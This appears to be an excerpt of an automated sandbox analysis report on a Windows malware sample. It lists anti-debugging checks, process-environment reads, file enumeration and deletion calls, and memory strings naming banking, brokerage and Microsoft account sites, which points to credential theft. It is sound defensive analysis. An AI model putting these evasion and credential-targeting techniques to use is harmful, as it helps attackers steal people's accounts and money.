Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C3445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00C3445A
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C3C6D1 FindFirstFileW,FindClose,	0_2_00C3C6D1
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C3C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00C3C75C
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C3EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C3EF95
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C3F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C3F0F2
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C3F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00C3F3F3
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C337EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00C337EF
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C33B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00C33B12
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_00C3BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00C3BCBC
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 5_2_001CC730 FindFirstFileW,FindNextFileW,FindClose,	5_2_001CC730

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Code function: 0_2_00BD49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00BD49A0

Source: 73272964.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 73272964.5.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: 73272964.5.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 73272964.5.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 73272964.5.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: 73272964.5.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 73272964.5.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 73272964.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 73272964.5.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: HSGhOUKfqFw.exe, 00000007.00000002.3912572786.00000000012FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]
Source: 73272964.5.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: 73272964.5.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 73272964.5.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 73272964.5.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 73272964.5.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 73272964.5.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: msdt.exe, 00000005.00000002.3911543722.0000000000592000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 73272964.5.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 73272964.5.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 73272964.5.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 73272964.5.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 73272964.5.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: 73272964.5.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 73272964.5.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 73272964.5.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 73272964.5.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 73272964.5.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 73272964.5.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 73272964.5.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: 73272964.5.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 73272964.5.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 73272964.5.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 73272964.5.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: firefox.exe, 00000008.00000002.2787474149.00000179BC9AD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllTT

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0357096E rdtsc

2_2_0357096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_00417743 LdrLoadDll,

2_2_00417743

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Code function: 0_2_00C43F09 BlockInput,

0_2_00C43F09

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Code function: 0_2_00BD3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00BD3B3A

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Code function: 0_2_00C05A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_00C05A7C

Source: C:\Users\user\Desktop\rACq8Eaix6.exe

Code function: 0_2_00BD4B37 LoadLibraryA,GetProcAddress,

0_2_00BD4B37

Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_0181B280 mov eax, dword ptr fs:[00000030h]	0_2_0181B280
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_0181C910 mov eax, dword ptr fs:[00000030h]	0_2_0181C910
Source: C:\Users\user\Desktop\rACq8Eaix6.exe	Code function: 0_2_0181C8B0 mov eax, dword ptr fs:[00000030h]	0_2_0181C8B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]	2_2_035B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]	2_2_035B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]	2_2_035B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B035C mov ecx, dword ptr fs:[00000030h]	2_2_035B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]	2_2_035B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B035C mov eax, dword ptr fs:[00000030h]	2_2_035B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035FA352 mov eax, dword ptr fs:[00000030h]	2_2_035FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D8350 mov ecx, dword ptr fs:[00000030h]	2_2_035D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B2349 mov eax, dword ptr fs:[00000030h]	2_2_035B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D437C mov eax, dword ptr fs:[00000030h]	2_2_035D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0360634F mov eax, dword ptr fs:[00000030h]	2_2_0360634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352C310 mov ecx, dword ptr fs:[00000030h]	2_2_0352C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03608324 mov eax, dword ptr fs:[00000030h]	2_2_03608324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03608324 mov ecx, dword ptr fs:[00000030h]	2_2_03608324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03608324 mov eax, dword ptr fs:[00000030h]	2_2_03608324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03608324 mov eax, dword ptr fs:[00000030h]	2_2_03608324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03550310 mov ecx, dword ptr fs:[00000030h]	2_2_03550310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A30B mov eax, dword ptr fs:[00000030h]	2_2_0356A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A30B mov eax, dword ptr fs:[00000030h]	2_2_0356A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356A30B mov eax, dword ptr fs:[00000030h]	2_2_0356A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE3DB mov eax, dword ptr fs:[00000030h]	2_2_035DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE3DB mov eax, dword ptr fs:[00000030h]	2_2_035DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_035DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE3DB mov eax, dword ptr fs:[00000030h]	2_2_035DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D43D4 mov eax, dword ptr fs:[00000030h]	2_2_035D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035D43D4 mov eax, dword ptr fs:[00000030h]	2_2_035D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EC3CD mov eax, dword ptr fs:[00000030h]	2_2_035EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0353A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0353A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0353A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0353A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0353A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0353A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h]	2_2_035383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h]	2_2_035383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h]	2_2_035383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035383C0 mov eax, dword ptr fs:[00000030h]	2_2_035383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B63C0 mov eax, dword ptr fs:[00000030h]	2_2_035B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0354E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0354E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0354E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0354E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035663FF mov eax, dword ptr fs:[00000030h]	2_2_035663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]	2_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]	2_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]	2_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]	2_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]	2_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]	2_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]	2_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035403E9 mov eax, dword ptr fs:[00000030h]	2_2_035403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03528397 mov eax, dword ptr fs:[00000030h]	2_2_03528397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03528397 mov eax, dword ptr fs:[00000030h]	2_2_03528397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03528397 mov eax, dword ptr fs:[00000030h]	2_2_03528397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352E388 mov eax, dword ptr fs:[00000030h]	2_2_0352E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352E388 mov eax, dword ptr fs:[00000030h]	2_2_0352E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352E388 mov eax, dword ptr fs:[00000030h]	2_2_0352E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355438F mov eax, dword ptr fs:[00000030h]	2_2_0355438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0355438F mov eax, dword ptr fs:[00000030h]	2_2_0355438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352A250 mov eax, dword ptr fs:[00000030h]	2_2_0352A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536259 mov eax, dword ptr fs:[00000030h]	2_2_03536259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EA250 mov eax, dword ptr fs:[00000030h]	2_2_035EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EA250 mov eax, dword ptr fs:[00000030h]	2_2_035EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B8243 mov eax, dword ptr fs:[00000030h]	2_2_035B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B8243 mov ecx, dword ptr fs:[00000030h]	2_2_035B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035E0274 mov eax, dword ptr fs:[00000030h]	2_2_035E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03534260 mov eax, dword ptr fs:[00000030h]	2_2_03534260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03534260 mov eax, dword ptr fs:[00000030h]	2_2_03534260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03534260 mov eax, dword ptr fs:[00000030h]	2_2_03534260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352826B mov eax, dword ptr fs:[00000030h]	2_2_0352826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0360625D mov eax, dword ptr fs:[00000030h]	2_2_0360625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352823B mov eax, dword ptr fs:[00000030h]	2_2_0352823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0353A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0353A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0353A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0353A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0353A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0353A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035402E1 mov eax, dword ptr fs:[00000030h]	2_2_035402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035402E1 mov eax, dword ptr fs:[00000030h]	2_2_035402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035402E1 mov eax, dword ptr fs:[00000030h]	2_2_035402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036062D6 mov eax, dword ptr fs:[00000030h]	2_2_036062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E284 mov eax, dword ptr fs:[00000030h]	2_2_0356E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0356E284 mov eax, dword ptr fs:[00000030h]	2_2_0356E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B0283 mov eax, dword ptr fs:[00000030h]	2_2_035B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B0283 mov eax, dword ptr fs:[00000030h]	2_2_035B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B0283 mov eax, dword ptr fs:[00000030h]	2_2_035B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035402A0 mov eax, dword ptr fs:[00000030h]	2_2_035402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035402A0 mov eax, dword ptr fs:[00000030h]	2_2_035402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]	2_2_035C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_035C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]	2_2_035C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]	2_2_035C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]	2_2_035C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C62A0 mov eax, dword ptr fs:[00000030h]	2_2_035C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352C156 mov eax, dword ptr fs:[00000030h]	2_2_0352C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C8158 mov eax, dword ptr fs:[00000030h]	2_2_035C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604164 mov eax, dword ptr fs:[00000030h]	2_2_03604164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03604164 mov eax, dword ptr fs:[00000030h]	2_2_03604164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536154 mov eax, dword ptr fs:[00000030h]	2_2_03536154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03536154 mov eax, dword ptr fs:[00000030h]	2_2_03536154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]	2_2_035C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]	2_2_035C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C4144 mov ecx, dword ptr fs:[00000030h]	2_2_035C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]	2_2_035C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035C4144 mov eax, dword ptr fs:[00000030h]	2_2_035C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DA118 mov ecx, dword ptr fs:[00000030h]	2_2_035DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DA118 mov eax, dword ptr fs:[00000030h]	2_2_035DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DA118 mov eax, dword ptr fs:[00000030h]	2_2_035DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DA118 mov eax, dword ptr fs:[00000030h]	2_2_035DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F0115 mov eax, dword ptr fs:[00000030h]	2_2_035F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov ecx, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov ecx, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov ecx, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov eax, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035DE10E mov ecx, dword ptr fs:[00000030h]	2_2_035DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03560124 mov eax, dword ptr fs:[00000030h]	2_2_03560124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_036061E5 mov eax, dword ptr fs:[00000030h]	2_2_036061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_035AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_035AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_035AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_035AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_035AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F61C3 mov eax, dword ptr fs:[00000030h]	2_2_035F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035F61C3 mov eax, dword ptr fs:[00000030h]	2_2_035F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035601F8 mov eax, dword ptr fs:[00000030h]	2_2_035601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]	2_2_035B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]	2_2_035B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]	2_2_035B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035B019F mov eax, dword ptr fs:[00000030h]	2_2_035B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352A197 mov eax, dword ptr fs:[00000030h]	2_2_0352A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352A197 mov eax, dword ptr fs:[00000030h]	2_2_0352A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0352A197 mov eax, dword ptr fs:[00000030h]	2_2_0352A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03570185 mov eax, dword ptr fs:[00000030h]	2_2_03570185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EC188 mov eax, dword ptr fs:[00000030h]	2_2_035EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035EC188 mov eax, dword ptr fs:[00000030h]	2_2_035EC188
